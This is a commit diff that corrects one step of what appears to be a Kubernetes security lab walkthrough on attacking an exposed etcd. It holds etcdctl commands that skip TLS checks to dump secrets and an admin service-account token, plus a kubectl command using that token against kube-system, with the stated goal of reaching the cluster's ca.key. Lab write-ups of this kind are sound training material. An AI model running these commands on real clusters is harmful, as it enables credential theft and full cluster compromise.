fix broken command

/registry/secrets/kube-system/admins-account-token-RAND doesn't exist, but a very similarly worded account token does: /registry/secrets/default/admins-account-token-RAND Upon testing, this account token (even though its associated with the default namespace) gives you access to the kube-system namespace and is sufficient for obtaining ca.key I've replaced the broken command with a working one to avoid future confusion.
raesene · Aug 18, 2022 · 8c424f5 · 8c424f5
1 parent 3108734
commit 8c424f5
Showing 1 changed file with 1 addition and 1 deletion.
diff --git a/Scenario Walkthroughs/etcd.md b/Scenario Walkthroughs/etcd.md
@@ -5,7 +5,7 @@
 3. First we need to dump some secrets out of the etcd database 
   `etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[CLUSTERIP]:2379 get / --prefix --keys-only | grep token`
 4. Then we'll need a service account token to authenticate to the cluster with. Looking through the list of accounts we can see an admins-account
-  `etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[IP]:2379 get /registry/secrets/kube-system/admins-account-token-[RAND]`
+  `etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[IP]:2379 get /registry/secrets/default/admins-account-token-[RAND]`
   The service account token starts with ey and ends just before the word `kubernetes.io` in the token. 
 5. With the service token we can use kubectl , first get the API pod name
   `kubectl --insecure-skip-tls-verify -shttps://[IP]:6443/ --token="[TOKEN]" -n kube-system get po`